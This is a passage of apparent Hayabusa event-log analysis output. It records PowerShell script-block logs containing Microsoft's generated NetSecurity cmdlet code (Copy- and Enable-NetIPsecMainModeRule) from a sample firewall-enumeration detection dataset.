[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; 
Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 